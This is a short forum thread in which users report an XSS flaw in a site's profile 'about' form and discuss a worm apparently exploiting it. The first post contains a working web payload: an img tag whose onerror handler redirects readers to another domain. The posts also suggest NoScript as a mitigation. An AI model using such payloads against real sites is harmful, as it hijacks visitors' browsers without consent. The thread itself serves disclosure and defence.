Hello, your site is vulnerable to XSS from the profile about form.
| Author | Topic |
|---|---|
|
div
|
Posted 2023-07-12 23:59:22
Observe. I am sorry to inform you of this publicly. Feel free to delete this message. <img src="x" onerror="window.location.href = 'https://divsel.neocities.org'" /> In the mean time, if you're a user who is interested in mitigating this problem, you can use NoScript Suite to mark JS from this domain as untrusted. Last edited on 2023-07-13 00:17:44 |
|
hazel
|
Posted 2025-04-16 10:02:30
Bump! This still happens. |
|
cyanide
|
Posted 2025-04-23 19:20:27
Yep, there's an XSS worm going around right now. I'm using the NoScript Suite for now to block it as suggested by div, but it also means that statuscafe widgets are disabled on external websites which is really annoying.  
|
